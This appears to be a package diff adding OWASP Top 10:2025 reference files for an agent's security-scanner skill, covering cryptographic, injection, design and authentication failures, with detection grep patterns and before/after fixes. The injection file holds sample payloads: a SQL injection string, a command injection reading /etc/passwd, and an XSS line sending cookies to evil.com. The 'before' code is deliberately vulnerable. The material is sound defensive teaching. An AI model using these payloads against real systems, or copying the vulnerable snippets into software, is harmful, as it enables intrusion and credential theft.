create-agentic-app 1.1.55 → 1.1.57

package/template/.agents/skills/security-scanner/references/A04-cryptographic-failures.md

@@ -0,0 +1,141 @@
+# A04:2025 — Cryptographic Failures
+
+## Overview
+
+Cryptographic Failures is #4 in OWASP Top 10:2025 (down from #2). It covers failures related to lack of cryptography, insufficiently strong cryptography, leaking of cryptographic keys, and related errors. 32 CWEs mapped, 1,665,348 total occurrences, 2,185 CVEs.
+
+## Key CWEs
+
+- **CWE-261**: Weak Encoding for Password
+- **CWE-319**: Cleartext Transmission of Sensitive Information
+- **CWE-321**: Use of Hard-coded Cryptographic Key
+- **CWE-326**: Inadequate Encryption Strength
+- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
+- **CWE-328**: Reversible One-Way Hash
+- **CWE-330**: Use of Insufficiently Random Values
+- **CWE-338**: Use of Cryptographically Weak PRNG
+- **CWE-759**: Use of One-Way Hash Without a Salt
+- **CWE-916**: Use of Password Hash With Insufficient Computational Effort
+
+## What to Look For
+
+### General Patterns
+- Weak hashing algorithms used for passwords (MD5, SHA1, SHA256 without key stretching)
+- Missing salt in password hashing
+- Hardcoded cryptographic keys, secrets, or API keys in source code
+- Sensitive data transmitted without encryption (HTTP, FTP, SMTP)
+- Weak random number generation for security tokens (Math.random, rand())
+- Cookies missing `Secure` flag (sent over HTTP)
+- Sensitive data in logs (passwords, tokens, credit cards, PII)
+- Base64 encoding used as "encryption" for tokens or secrets
+- Deprecated crypto algorithms (DES, 3DES, RC4, MD5, SHA1)
+- Missing HSTS headers
+- Hardcoded IVs or nonces in encryption
+
+### Grep Patterns
+
+```
+# Weak hashing
+createHash\(['"]md5['"]\)|createHash\(['"]sha1['"]\)
+hashlib\.md5|hashlib\.sha1
+MessageDigest\.getInstance\(['"]MD5['"]\)|MessageDigest\.getInstance\(['"]SHA-1['"]\)
+md5\(|sha1\(
+
+# Weak randomness
+Math\.random|random\.random|rand\(\)|Random\(\)
+uuid.*v1|Date\.now
+
+# Hardcoded secrets/keys
+SECRET.*=\s*['"][^'"]{8,}|KEY.*=\s*['"][^'"]{8,}|PASSWORD.*=\s*['"][^'"]{4,}
+private.?key|secret.?key|api.?key|access.?token
+
+# Base64 as "encryption"
+Buffer\.from.*base64|btoa\(|atob\(
+base64\.encode|base64\.decode
+
+# Cookie security flags
+httpOnly\s*:\s*false|secure\s*:\s*false|sameSite.*none
+Set-Cookie(?!.*Secure)(?!.*HttpOnly)
+
+# Cleartext protocols
+http:\/\/(?!localhost)|ftp:\/\/|smtp:\/\/
+```
+
+### JavaScript / TypeScript / Node.js
+- `crypto.createHash('md5')` or `crypto.createHash('sha1')` for password hashing
+- `Math.random()` used for tokens, session IDs, or reset codes
+- `Buffer.from(data).toString('base64')` used as a "token" (trivially decodable)
+- Session cookies set without `httpOnly: true`, `secure: true`, `sameSite: 'strict'`
+- JWT secrets hardcoded in source files
+- Missing `bcrypt`, `argon2`, or `scrypt` for password hashing
+
+### Python
+- `hashlib.md5()` or `hashlib.sha1()` for passwords
+- `random.random()` or `random.randint()` for security tokens (should use `secrets` module)
+- `base64.b64encode()` used as encryption
+
+### Java
+- `MessageDigest.getInstance("MD5")` or `MessageDigest.getInstance("SHA-1")`
+- `java.util.Random` instead of `java.security.SecureRandom`
+- Hardcoded keys in `KeySpec` constructors
+
+## Prevention Measures
+
+1. Classify data and identify what needs encryption per privacy laws and regulations
+2. Don't store sensitive data unnecessarily — data not retained cannot be stolen
+3. Encrypt all sensitive data at rest using strong algorithms (AES-256)
+4. Use TLS 1.2+ for all data in transit; enforce with HSTS
+5. Store passwords with strong adaptive hashing: Argon2, scrypt, bcrypt, or PBKDF2
+6. Always use salts and appropriate work factors
+7. Use CSPRNG for all security-sensitive random values
+8. Never reuse IVs/nonces with the same key
+9. Use authenticated encryption (GCM mode, not ECB/CBC)
+10. Rotate cryptographic keys regularly
+11. Disable caching for responses containing sensitive data
+
+## Example Attack Scenarios
+
+**Scenario 1 — Weak Password Hashing:**
+Password database uses unsalted MD5. Attacker retrieves database via another vulnerability, cracks all passwords via rainbow tables in minutes.
+
+**Scenario 2 — Predictable Tokens:**
+Password reset tokens generated with `Math.random()`. Attacker predicts tokens and resets other users' passwords.
+
+## Fix Examples
+
+**Before (MD5 password hashing):**
+```typescript
+import crypto from 'crypto';
+function hashPassword(password: string) {
+  return crypto.createHash('md5').update(password).digest('hex');
+}
+```
+
+**After (bcrypt with salt):**
+```typescript
+import bcrypt from 'bcrypt';
+async function hashPassword(password: string) {
+  return bcrypt.hash(password, 12);
+}
+async function verifyPassword(password: string, hash: string) {
+  return bcrypt.compare(password, hash);
+}
+```
+
+**Before (predictable token):**
+```typescript
+const resetToken = Math.random().toString(36).substring(2);
+```
+
+**After (cryptographically secure token):**
+```typescript
+import crypto from 'crypto';
+const resetToken = crypto.randomBytes(32).toString('hex');
+```
+
+## References
+
+- [OWASP A04:2025](https://owasp.org/Top10/2025/A04_2025-Cryptographic_Failures/)
+- OWASP Cheat Sheet: Password Storage
+- OWASP Cheat Sheet: Cryptographic Storage
+- OWASP Cheat Sheet: Transport Layer Protection

package/template/.agents/skills/security-scanner/references/A05-injection.md

@@ -0,0 +1,155 @@
+# A05:2025 — Injection
+
+## Overview
+
+Injection is #5 in OWASP Top 10:2025 (down from #3). 100% of applications were tested for injection, and the category holds the highest CVE count at 62,445 across 37 CWEs. Injection occurs when untrusted user input is sent to an interpreter and executed as commands — including SQL, NoSQL, OS command, ORM, LDAP, and Expression Language injection. Cross-Site Scripting (XSS) is included in this category.
+
+## Key CWEs
+
+- **CWE-79**: Cross-site Scripting (XSS) — 30,000+ CVEs
+- **CWE-89**: SQL Injection — 14,000+ CVEs
+- **CWE-78**: OS Command Injection
+- **CWE-20**: Improper Input Validation
+- **CWE-94**: Improper Control of Generation of Code (Code Injection)
+- **CWE-77**: Command Injection
+- **CWE-74**: Injection (general)
+- **CWE-917**: Expression Language Injection
+- **CWE-1336**: Template Injection
+
+## What to Look For
+
+### SQL Injection
+- String concatenation in SQL queries (instead of parameterized queries)
+- Template literals embedding user input directly into SQL
+- ORM methods with raw query options using unsanitized input
+- Dynamic table/column names from user input
+
+### Command Injection
+- `exec()`, `spawn()`, `system()`, `popen()` with user-controlled arguments
+- Shell command strings built with user input concatenation
+- `child_process` usage with unsanitized input
+
+### Cross-Site Scripting (XSS)
+- `dangerouslySetInnerHTML` in React without sanitization
+- `innerHTML`, `outerHTML`, `document.write()` with user data
+- Template rendering of unsanitized user input
+- URL parameters reflected into HTML without encoding
+
+### Code Injection
+- `eval()` with user-controlled input
+- `Function()` constructor with user input
+- `setTimeout`/`setInterval` with string arguments from user input
+- Dynamic `import()` with user-controlled paths
+
+### Server-Side Request Forgery (SSRF)
+- HTTP requests where the URL is user-controlled
+- URL parsing/fetching endpoints without allowlist validation
+- Image/preview/proxy endpoints fetching arbitrary URLs
+
+### Grep Patterns
+
+```
+# SQL injection
+\+.*['"].*SELECT|SELECT.*\+.*req\.|SELECT.*\$\{|SELECT.*%s
+\.query\(.*\+|\.execute\(.*\+|\.raw\(.*\+
+f"SELECT|f"INSERT|f"UPDATE|f"DELETE
+
+# Command injection
+exec\(|execSync\(|spawn\(|spawnSync\(
+child_process|subprocess|os\.system|os\.popen
+Runtime\.getRuntime\(\)\.exec
+
+# XSS
+dangerouslySetInnerHTML|innerHTML|outerHTML|document\.write
+v-html|ng-bind-html|\{\{\{.*\}\}\}
+
+# Code injection
+eval\(|Function\(|new Function|setTimeout\(.*req|setInterval\(.*req
+
+# SSRF
+fetch\(.*req\.|axios\(.*req\.|http\.get\(.*req\.|urllib.*req\.
+request\.get\(.*user|requests\.get\(.*param
+```
+
+### JavaScript / TypeScript / Node.js
+- Template literals in SQL: `` `SELECT * FROM users WHERE id = ${req.params.id}` ``
+- `exec(command)` where command includes user input
+- `dangerouslySetInnerHTML={{ __html: userContent }}`
+- `eval(req.body.code)` or similar
+- `fetch(req.query.url)` in preview/proxy endpoints
+
+### Python (Django/Flask)
+- `cursor.execute(f"SELECT ... {user_input}")` — use parameterized queries
+- `os.system(f"command {user_input}")` — use subprocess with shell=False
+- `eval(request.data)` or `exec(request.data)`
+- Jinja2 `|safe` filter on user input
+
+### Java (Spring)
+- `Statement.executeQuery()` with concatenated SQL (use `PreparedStatement`)
+- `Runtime.getRuntime().exec()` with user input
+- JSP `<%= request.getParameter() %>` without encoding
+
+## Prevention Measures
+
+1. Use parameterized queries / prepared statements for ALL database access
+2. Use safe APIs that avoid the interpreter entirely
+3. Implement positive server-side input validation (allowlists)
+4. Escape special characters using interpreter-specific syntax
+5. Use LIMIT and other SQL controls to prevent mass disclosure
+6. For XSS: use framework auto-escaping, CSP headers, sanitize HTML (DOMPurify)
+7. For command injection: avoid shell execution entirely; use library functions
+8. For SSRF: validate and allowlist URLs; block internal network ranges
+
+## Example Attack Scenarios
+
+**Scenario 1 — SQL Injection:**
+```
+https://example.com/search?q=' OR '1'='1
+```
+Query becomes: `SELECT * FROM items WHERE name = '' OR '1'='1'` — returns all records.
+
+**Scenario 2 — Command Injection:**
+```
+https://example.com/export?file=report;cat /etc/passwd
+```
+Server executes: `convert report;cat /etc/passwd` — leaks system files.
+
+**Scenario 3 — XSS:**
+User stores `<script>document.location='https://evil.com/steal?c='+document.cookie</script>` as content, which executes in other users' browsers.
+
+## Fix Examples
+
+**Before (SQL injection):**
+```typescript
+const query = `SELECT * FROM notes WHERE title LIKE '%${searchTerm}%'`;
+const results = db.all(query);
+```
+
+**After (parameterized query):**
+```typescript
+const results = db.all(
+  'SELECT * FROM notes WHERE title LIKE ?',
+  [`%${searchTerm}%`]
+);
+```
+
+**Before (command injection):**
+```typescript
+const { exec } = require('child_process');
+exec(`convert ${req.query.filename} output.pdf`);
+```
+
+**After (safe alternative):**
+```typescript
+const { execFile } = require('child_process');
+const safeName = path.basename(req.query.filename);
+execFile('convert', [safeName, 'output.pdf']);
+```
+
+## References
+
+- [OWASP A05:2025](https://owasp.org/Top10/2025/A05_2025-Injection/)
+- OWASP Cheat Sheet: Injection Prevention
+- OWASP Cheat Sheet: SQL Injection Prevention
+- OWASP Cheat Sheet: Query Parameterization
+- OWASP Cheat Sheet: XSS Prevention

package/template/.agents/skills/security-scanner/references/A06-insecure-design.md

@@ -0,0 +1,145 @@
+# A06:2025 — Insecure Design
+
+## Overview
+
+Insecure Design is #6 in OWASP Top 10:2025. This category focuses on architectural and design flaws — not implementation bugs. "A secure design can still have implementation defects, but an insecure design cannot be fixed by a perfect implementation." It encompasses 39 CWEs with 729,882 total occurrences. The focus is on missing or ineffective control design around requirements, secure design methodology, and secure development lifecycle.
+
+## Key CWEs
+
+- **CWE-256**: Unprotected Storage of Credentials
+- **CWE-269**: Improper Privilege Management
+- **CWE-434**: Unrestricted Upload of File with Dangerous Type
+- **CWE-501**: Trust Boundary Violation
+- **CWE-522**: Insufficiently Protected Credentials
+- **CWE-657**: Violation of Secure Design Principles
+- **CWE-799**: Improper Control of Interaction Frequency
+- **CWE-807**: Reliance on Untrusted Inputs in Security Decisions
+
+## What to Look For
+
+### General Patterns
+- Missing rate limiting on sensitive endpoints (login, registration, password reset, OTP verification)
+- No input validation or schema validation on API endpoints
+- Business logic flaws (no password complexity requirements, unlimited retries)
+- Missing account lockout mechanisms after failed login attempts
+- Lack of defense in depth (single layer of protection)
+- Reset/verification tokens that are guessable, short, or never expire
+- Missing CAPTCHA or bot protection on public-facing forms
+- Unrestricted file upload (no type/size validation)
+- Security decisions based on client-side data
+- Missing tenant isolation in multi-tenant applications
+- No threat modeling evidence (design assumes trusted users)
+
+### Grep Patterns
+
+```
+# Missing rate limiting
+rateLimit|rate.?limit|throttle|express-rate-limit|slowDown
+login|signin|sign-in|authenticate|register|signup|sign-up
+reset.*password|forgot.*password|verify.*otp|verify.*code
+
+# Missing input validation
+body\.|req\.body\.|request\.body
+zod|yup|joi|ajv|validate|validator|schema
+express-validator|class-validator
+
+# Password policy
+password.*length|minLength|maxLength|complexity|strength
+passwordPolicy|password.*requirements
+
+# File upload without validation
+multer|formidable|busboy|upload
+fileFilter|allowedTypes|mimeType|fileSize|maxSize
+
+# Token expiration
+expires|expiry|expiration|ttl|maxAge
+resetToken|verificationToken|otpExpiry
+
+# Account lockout
+lockout|maxAttempts|failedAttempts|loginAttempts|accountLock
+```
+
+### JavaScript / TypeScript / Node.js
+- Express/Next.js API routes without `express-rate-limit` or equivalent middleware
+- Login/register endpoints accepting any password (no length/complexity check)
+- Password reset tokens using short numeric codes without expiration
+- File uploads via `multer` without `fileFilter` or size limits
+- Missing input validation — `req.body` used directly without Zod/Joi/Yup schema
+
+### Python (Django/Flask)
+- Views without `@ratelimit` decorator on auth endpoints
+- Missing `AUTH_PASSWORD_VALIDATORS` in Django settings
+- File uploads without `ALLOWED_EXTENSIONS` check
+- No `django-axes` or equivalent brute-force protection
+
+### Java (Spring)
+- Missing `@RateLimiter` on authentication controllers
+- No password policy configuration in `SecurityConfig`
+- `MultipartFile` accepted without content type validation
+
+## Prevention Measures
+
+1. Establish a secure development lifecycle with AppSec professionals
+2. Build and maintain libraries of secure design patterns and components
+3. Use threat modeling for critical authentication, access control, and business logic
+4. Integrate security requirements into user stories
+5. Write unit and integration tests that validate threat resistance
+6. Implement rate limiting on all sensitive endpoints
+7. Enforce input validation at every tier (client, API, database)
+8. Segregate system layers based on exposure and protection needs
+9. Implement robust multi-tenant isolation across all tiers
+
+## Example Attack Scenarios
+
+**Scenario 1:** Recovery workflows using knowledge-based questions ("security questions") — multiple people can know the answers, violating NIST 800-63b.
+
+**Scenario 2:** Cinema booking system allows unlimited group discount reservations without deposit or rate limiting — attacker books hundreds of seats, causing revenue loss.
+
+**Scenario 3:** E-commerce platform lacks bot protection — scalpers buy all limited inventory in seconds using automated tools.
+
+## Fix Examples
+
+**Before (no rate limiting on login):**
+```typescript
+export async function POST(req) {
+  const { email, password } = await req.json();
+  const user = await db.get('SELECT * FROM users WHERE email = ?', email);
+  // ... verify password and return token
+}
+```
+
+**After (with rate limiting):**
+```typescript
+import rateLimit from 'express-rate-limit';
+
+const loginLimiter = rateLimit({
+  windowMs: 15 * 60 * 1000, // 15 minutes
+  max: 5, // 5 attempts per window
+  message: { error: 'Too many login attempts, please try again later' }
+});
+
+// Apply loginLimiter middleware to the login route
+```
+
+**Before (no password policy):**
+```typescript
+const { password } = await req.json();
+const hash = await bcrypt.hash(password, 12);
+```
+
+**After (with password policy):**
+```typescript
+const { password } = await req.json();
+if (password.length < 12) return Response.json({ error: 'Password must be at least 12 characters' }, { status: 400 });
+if (!/[A-Z]/.test(password) || !/[0-9]/.test(password)) {
+  return Response.json({ error: 'Password must contain uppercase and numbers' }, { status: 400 });
+}
+const hash = await bcrypt.hash(password, 12);
+```
+
+## References
+
+- [OWASP A06:2025](https://owasp.org/Top10/2025/A06_2025-Insecure_Design/)
+- OWASP Secure Design Principles Cheat Sheet
+- OWASP SAMM Design
+- The Threat Modeling Manifesto

package/template/.agents/skills/security-scanner/references/A07-authentication-failures.md

@@ -0,0 +1,150 @@
+# A07:2025 — Authentication Failures
+
+## Overview
+
+Authentication Failures is #7 in OWASP Top 10:2025. It encompasses 36 CWEs with 1,120,673 total occurrences and 7,147 CVEs. Authentication failures occur when systems incorrectly validate user identity, allowing attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities.
+
+## Key CWEs
+
+- **CWE-259**: Use of Hard-coded Password
+- **CWE-287**: Improper Authentication
+- **CWE-297**: Improper Validation of Certificate with Host Mismatch
+- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
+- **CWE-384**: Session Fixation
+- **CWE-521**: Weak Password Requirements
+- **CWE-613**: Insufficient Session Expiration
+- **CWE-798**: Use of Hard-coded Credentials
+- **CWE-640**: Weak Password Recovery Mechanism
+
+## What to Look For
+
+### General Patterns
+- Weak session token generation (predictable, sequential, or base64-encoded user data)
+- Sessions that never expire or have excessively long lifetimes
+- Credentials appearing in URLs, logs, or error messages
+- No password strength requirements
+- Session cookies without `HttpOnly`, `Secure`, or `SameSite` flags
+- User enumeration via different error responses (valid vs invalid username)
+- Password reset tokens returned in API responses (should be sent via email/SMS only)
+- Reset tokens that don't expire or can be reused
+- Missing multi-factor authentication on critical operations
+- Hard-coded credentials in source code
+- Custom authentication instead of using established frameworks
+- Sessions not invalidated on logout or password change
+
+### Grep Patterns
+
+```
+# Session/token generation
+session|sessionId|session_id|sessionToken
+token.*=.*base64|token.*=.*encode|token.*=.*Math\.random
+uuid.*v1|Date\.now.*toString
+
+# Session cookie flags
+httpOnly|HttpOnly|http_only
+secure\s*:|Secure|secure.*false
+sameSite|SameSite|same_site
+
+# Session expiration
+maxAge|max_age|expires|expiry|SESSION_LIFETIME
+session.*timeout|session.*expire
+
+# User enumeration
+user.*not.*found|invalid.*user|no.*account|email.*not.*registered
+incorrect.*password|wrong.*password|invalid.*credentials
+
+# Password in logs/URLs
+console\.log.*password|logger.*password|log.*password
+password.*=.*req\.query|password.*=.*params
+
+# Hard-coded credentials
+password.*=.*['"][^'"]+['"]|credential.*=.*['"]
+admin.*admin|root.*root|test.*test
+DEFAULT_PASSWORD|ADMIN_PASSWORD
+
+# Reset tokens
+resetToken|reset_token|verification_token|verificationToken
+token.*response|json.*token.*reset
+```
+
+### JavaScript / TypeScript / Node.js
+- Session token built as `Buffer.from(userId + ':' + timestamp).toString('base64')` — trivially decodable
+- `Math.random()` used for session or reset tokens
+- Cookie set without `{ httpOnly: true, secure: true, sameSite: 'strict' }`
+- Login endpoint returns different messages for "user not found" vs "wrong password"
+- `console.log` including password or token values
+- Reset token returned directly in JSON response body
+- No session invalidation in logout handler
+
+### Python (Django/Flask)
+- Custom session management instead of Django's built-in
+- `SESSION_COOKIE_HTTPONLY = False` or `SESSION_COOKIE_SECURE = False`
+- Different error messages for invalid username vs invalid password
+- Flask `session.permanent = True` without `PERMANENT_SESSION_LIFETIME`
+
+### Java (Spring)
+- `HttpSession` without timeout configuration
+- Custom `AuthenticationProvider` without proper credential validation
+- Missing `invalidateHttpSession(true)` in logout configuration
+- `BCryptPasswordEncoder` with low strength parameter
+
+## Prevention Measures
+
+1. Implement multi-factor authentication to counter automated attacks
+2. Never ship with default or hard-coded credentials
+3. Validate passwords against breached credential databases (Have I Been Pwned)
+4. Follow NIST 800-63b guidelines for password policies
+5. Harden registration and login endpoints against enumeration and brute-force
+6. Use consistent, generic error messages ("Invalid credentials" for all auth failures)
+7. Rate-limit failed login attempts with logging and alerting
+8. Use secure, server-side session managers with high-entropy session IDs
+9. Set session cookies with `HttpOnly`, `Secure`, `SameSite=Strict`
+10. Invalidate sessions on logout and password change
+11. Use established authentication frameworks rather than building custom solutions
+12. Send reset tokens only via email/SMS — never return them in API responses
+
+## Example Attack Scenarios
+
+**Scenario 1 — Credential Stuffing:** Attacker uses known username/password pairs from breaches, modified with predictable patterns (Winter2025 → Winter2026). Without brute-force protection, the app becomes a password oracle.
+
+**Scenario 2 — Session Hijacking:** Session cookie set without `HttpOnly` flag. XSS vulnerability allows JavaScript to read `document.cookie` and send session token to attacker's server.
+
+**Scenario 3 — Session Persistence:** User closes browser without explicit logout. Session is never invalidated server-side. Next user on shared device accesses the previous user's authenticated session.
+
+## Fix Examples
+
+**Before (user enumeration):**
+```typescript
+if (!user) return Response.json({ error: 'User not found' }, { status: 401 });
+if (!validPassword) return Response.json({ error: 'Incorrect password' }, { status: 401 });
+```
+
+**After (consistent error message):**
+```typescript
+if (!user || !validPassword) {
+  return Response.json({ error: 'Invalid credentials' }, { status: 401 });
+}
+```
+
+**Before (insecure session cookie):**
+```typescript
+response.cookies.set('session', token, { httpOnly: false, path: '/' });
+```
+
+**After (secure session cookie):**
+```typescript
+response.cookies.set('session', token, {
+  httpOnly: true,
+  secure: true,
+  sameSite: 'strict',
+  maxAge: 3600,
+  path: '/'
+});
+```
+
+## References
+
+- [OWASP A07:2025](https://owasp.org/Top10/2025/A07_2025-Authentication_Failures/)
+- OWASP Authentication Cheat Sheet
+- OWASP Session Management Cheat Sheet
+- NIST SP 800-63b Digital Identity Guidelines